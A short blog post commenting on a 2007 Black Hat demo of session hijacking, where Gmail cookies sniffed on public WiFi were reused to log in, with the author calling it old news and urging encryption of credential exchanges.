So some of the jokers at Blackhat gave a very effective demo of why it is just plain stoopid to use public WiFi networks without turning up the paranoia level to max before you start. For their demo all they did was set up a willing victim and then do some basic network sniffing in order to feed a parser that extracted cookies from the captured data. That allowed them to snarf the target's google account cookie and then use that to log in to the victim's Gmail account.
It surprises me (a lot) that this is being presented as something new but hats off to Rob Graham and Errata Security for not only getting a gig at BlackHat 2007 for something that isn't really a hack, let alone something new, but that he has gotten the 'net media to distribute the news far and wide as an expose on how to "hack Web 2.0".
It's a welcome reminder though that you can't trust important data on any network and you should (at the very least) encrypt the part of any session that handles credential exchanges.
No comments:
Post a Comment